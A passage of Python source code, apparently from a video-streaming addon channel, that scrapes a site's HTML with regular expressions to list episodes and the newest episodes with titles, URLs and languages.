' % item.season\r\n for num_episode, url, title, langs in scrapertools.find_multiple_matches(data, patron):\r\n itemlist.append(item.clone(\r\n title=title,\r\n url=url,\r\n action=\"findvideos\",\r\n episode=int(num_episode),\r\n lang=[LNG.get(l) for l in\r\n scrapertools.find_multiple_matches(langs, 'title=\"([^\"]+)\"')],\r\n thumb=None,\r\n type='episode',\r\n content_type='servers'\r\n ))\r\n\r\n return itemlist\r\n\r\n\r\ndef newest_episodes(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n if not item.url:\r\n item.url = HOST + '/category/episode'\r\n\r\n data = httptools.downloadpage(item.url).data\r\n data = re.sub(r\"\\n|\\r|\\t|\\s{2}\", \"\", data)\r\n\r\n patron = '
.*?src=\"([^\"]+).*?' \\\r\n ']*>(.*?).*?(.*?).*?'\r\n '